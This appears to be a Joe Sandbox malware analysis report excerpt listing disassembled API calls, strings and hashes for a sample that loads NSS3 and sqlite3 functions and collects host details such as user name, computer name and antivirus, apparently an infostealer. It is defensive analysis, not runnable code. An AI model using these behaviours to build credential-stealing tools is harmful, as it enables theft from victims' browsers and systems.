                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 587344769-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AE10
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AE24
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,6CAED079,00000000,00000001), ref: 6CB0AE5A
                                                                                                                                                                                                              • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AE6F
                                                                                                                                                                                                              • free.MOZGLUE(85145F8B,?,?,?,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AE7F
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AEB1
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AEC9
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AEF1
                                                                                                                                                                                                              • free.MOZGLUE(6CAECDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CAECDBB,?), ref: 6CB0AF0B
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CAECDBB,?,6CAED079,00000000,00000001), ref: 6CB0AF30
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 161582014-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,00000000,00000000,?,6CAEAB7F,?,00000000,?), ref: 6CAE4CB4
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C,?,6CAEAB7F,?,00000000,?), ref: 6CAE4CC8
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,6CAEAB7F,?,00000000,?), ref: 6CAE4CE0
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,6CAEAB7F,?,00000000,?), ref: 6CAE4CF4
                                                                                                                                                                                                              • PL_HashTableLookup.NSS3(?,?,?,6CAEAB7F,?,00000000,?), ref: 6CAE4D03
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,00000000,?), ref: 6CAE4D10
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: TlsGetValue.KERNEL32 ref: 6CB6DD8C
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DDB4
                                                                                                                                                                                                              • PR_Now.NSS3(?,00000000,?), ref: 6CAE4D26
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CBD0A27), ref: 6CB89DC6
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CBD0A27), ref: 6CB89DD1
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB89DED
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,00000000,?), ref: 6CAE4D98
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CAE4DDA
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CAE4E02
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4032354334-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_initialize.NSS3 ref: 6CAAFD18
                                                                                                                                                                                                              • sqlite3_initialize.NSS3 ref: 6CAAFD5F
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CAAFD89
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6CAAFD99
                                                                                                                                                                                                              • sqlite3_free.NSS3(00000000), ref: 6CAAFE3C
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CAAFEE3
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CAAFEEE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                                                                                                                                                                              • String ID: simple
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CAB5EC9
                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CAB5EED
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • misuse, xrefs: 6CAB5EDB
                                                                                                                                                                                                              • unable to close due to unfinalized statements or unfinished backups, xrefs: 6CAB5E64
                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CAB5ED1
                                                                                                                                                                                                              • invalid, xrefs: 6CAB5EBE
                                                                                                                                                                                                              • API call with %s database connection pointer, xrefs: 6CAB5EC3
                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CAB5EE0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA9DDF9
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA9DE68
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA9DE97
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CA9DEB6
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA9DF78
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CA4B999), ref: 6CA4CFF3
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CA4B999), ref: 6CA4D02B
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6CA4B999), ref: 6CA4D041
                                                                                                                                                                                                              • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CA4B999), ref: 6CB9972B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,75B65460,?,00000000), ref: 0092DB90
                                                                                                                                                                                                              • strchr.MSVCRT ref: 0092DBA2
                                                                                                                                                                                                              • strchr.MSVCRT ref: 0092DBC7
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0092DCCC), ref: 0092DBE9
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0092DBF6
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0092DCCC), ref: 0092DBFD
                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0092DC44
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
                                                                                                                                                                                                              • String ID: 0123456789ABCDEF
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • UnDecorator::getArgumentList.LIBCMT ref: 0093FAF7
                                                                                                                                                                                                                • Part of subcall function 0093F692: Replicator::operator[].LIBCMT ref: 0093F715
                                                                                                                                                                                                                • Part of subcall function 0093F692: DName::operator+=.LIBCMT ref: 0093F71D
                                                                                                                                                                                                              • DName::operator+.LIBCMT ref: 0093FB50
                                                                                                                                                                                                              • DName::DName.LIBCMT ref: 0093FBA8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                                                                                                              • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • UnDecorator::UScore.LIBCMT ref: 00941475
                                                                                                                                                                                                              • DName::DName.LIBCMT ref: 00941481
                                                                                                                                                                                                                • Part of subcall function 0093F14C: DName::doPchar.LIBCMT ref: 0093F17D
                                                                                                                                                                                                              • UnDecorator::getScopedName.LIBCMT ref: 009414C0
                                                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 009414CA
                                                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 009414D9
                                                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 009414E5
                                                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 009414F2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                                                                                                              • String ID: void
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0093154A
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00931555
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00931560
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0093156B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,009340D8,?,Display Resolution: ,009568FC,00000000,User Name: ,009568EC,00000000,Computer Name: ,009568D8,AV: ,009568CC), ref: 00931577
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,009340D8,?,Display Resolution: ,009568FC,00000000,User Name: ,009568EC,00000000,Computer Name: ,009568D8,AV: ,009568CC,Install Date: ), ref: 0093157E
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00931590
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                                              • String ID: %dx%d
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,00000100,?), ref: 6CB0CD08
                                                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,?), ref: 6CB0CE16
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB0D079
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6CB097C1,?,00000000,00000000,?,?,?,00000000,?,6CAE7F4A,00000000), ref: 6CAFDC68
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: malloc.MOZGLUE(6CB18D2D,?,00000000,?), ref: 6CB20BF8
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: TlsGetValue.KERNEL32(6CB18D2D,?,00000000,?), ref: 6CB20C15
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CAFDD36
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CAFDE2D
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CAFDE43
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CAFDE76
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CAFDF32
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CAFDF5F
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CAFDF78
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6CAE7F4A,00000000,?,00000000,00000000), ref: 6CAFDFAA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc_Util$memcpy$Valuemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1886645929-0
                                                                                                                                                                                                              • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                              • Instruction ID: bb7a09c7a2ae7fa9446896298397609b3fb17c42ae25c1a6c37a1a928f27a6a3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA81B071E066018BFB134E19D89036976B2DB60349F28883AF979CBFE5D778C4C6C612
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6CAD3C76
                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(00000000), ref: 6CAD3C94
                                                                                                                                                                                                                • Part of subcall function 6CAC95B0: TlsGetValue.KERNEL32(00000000,?,6CAE00D2,00000000), ref: 6CAC95D2
                                                                                                                                                                                                                • Part of subcall function 6CAC95B0: EnterCriticalSection.KERNEL32(?,?,?,6CAE00D2,00000000), ref: 6CAC95E7
                                                                                                                                                                                                                • Part of subcall function 6CAC95B0: PR_Unlock.NSS3(?,?,?,?,6CAE00D2,00000000), ref: 6CAC9605
                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6CAD3CB2
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6CAD3CCA
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6CAD3CE1
                                                                                                                                                                                                                • Part of subcall function 6CAD3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CAEAE42), ref: 6CAD30AA
                                                                                                                                                                                                                • Part of subcall function 6CAD3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CAD30C7
                                                                                                                                                                                                                • Part of subcall function 6CAD3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CAD30E5
                                                                                                                                                                                                                • Part of subcall function 6CAD3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAD3116
                                                                                                                                                                                                                • Part of subcall function 6CAD3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CAD312B
                                                                                                                                                                                                                • Part of subcall function 6CAD3090: PK11_DestroyObject.NSS3(?,?), ref: 6CAD3154
                                                                                                                                                                                                                • Part of subcall function 6CAD3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD317E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3167935723-0
                                                                                                                                                                                                              • Opcode ID: 3629e80f11d1c25c09a7b031888952bd4cecd748bbfa03f533c97725ba6dde81
                                                                                                                                                                                                              • Instruction ID: 50d3d4c71b1f64e38c239d1d259d4b8362978ce7c88603151340589b56cfc0ce
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3629e80f11d1c25c09a7b031888952bd4cecd748bbfa03f533c97725ba6dde81
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A61E8B1A01201BBEB105F65DC45FAB7AB9EF0474CF0D4028FD499AA92F731E958C7A1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CB13440: PK11_GetAllTokens.NSS3 ref: 6CB13481
                                                                                                                                                                                                                • Part of subcall function 6CB13440: PR_SetError.NSS3(00000000,00000000), ref: 6CB134A3
                                                                                                                                                                                                                • Part of subcall function 6CB13440: TlsGetValue.KERNEL32 ref: 6CB1352E
                                                                                                                                                                                                                • Part of subcall function 6CB13440: EnterCriticalSection.KERNEL32(?), ref: 6CB13542
                                                                                                                                                                                                                • Part of subcall function 6CB13440: PR_Unlock.NSS3(?), ref: 6CB1355B
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB13D8B
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB13D9F
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB13DCA
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB13DE2
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CB13E4F
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB13E97
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB13EAB
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB13ED6
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB13EEE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2554137219-0
                                                                                                                                                                                                              • Opcode ID: 90da4532d24183bf153350d8a2539b707abb735c543b747a8f9c096e484f9ab8
                                                                                                                                                                                                              • Instruction ID: 7b111def05654ffdb5ae6631ddb7aa367558308e0de2d99c3abecaa38c6e9476
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90da4532d24183bf153350d8a2539b707abb735c543b747a8f9c096e484f9ab8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C512676A047819FDB01AF29DC44B6A77B4EF45318F150168DE0957E11FB31E984CBE2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(6E1D4487), ref: 6CAC2C5D
                                                                                                                                                                                                                • Part of subcall function 6CB20D30: calloc.MOZGLUE ref: 6CB20D50
                                                                                                                                                                                                                • Part of subcall function 6CB20D30: TlsGetValue.KERNEL32 ref: 6CB20D6D
                                                                                                                                                                                                              • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CAC2C8D
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAC2CE0
                                                                                                                                                                                                                • Part of subcall function 6CAC2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CAC2CDA,?,00000000), ref: 6CAC2E1E
                                                                                                                                                                                                                • Part of subcall function 6CAC2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CAC2E33
                                                                                                                                                                                                                • Part of subcall function 6CAC2E00: TlsGetValue.KERNEL32 ref: 6CAC2E4E
                                                                                                                                                                                                                • Part of subcall function 6CAC2E00: EnterCriticalSection.KERNEL32(?), ref: 6CAC2E5E
                                                                                                                                                                                                                • Part of subcall function 6CAC2E00: PL_HashTableLookup.NSS3(?), ref: 6CAC2E71
                                                                                                                                                                                                                • Part of subcall function 6CAC2E00: PL_HashTableRemove.NSS3(?), ref: 6CAC2E84
                                                                                                                                                                                                                • Part of subcall function 6CAC2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CAC2E96
                                                                                                                                                                                                                • Part of subcall function 6CAC2E00: PR_Unlock.NSS3 ref: 6CAC2EA9
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAC2D23
                                                                                                                                                                                                              • CERT_IsCACert.NSS3(00000001,00000000), ref: 6CAC2D30
                                                                                                                                                                                                              • CERT_MakeCANickname.NSS3(00000001), ref: 6CAC2D3F
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAC2D73
                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6CAC2DB8
                                                                                                                                                                                                              • free.MOZGLUE ref: 6CAC2DC8
                                                                                                                                                                                                                • Part of subcall function 6CAC3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC3EC2
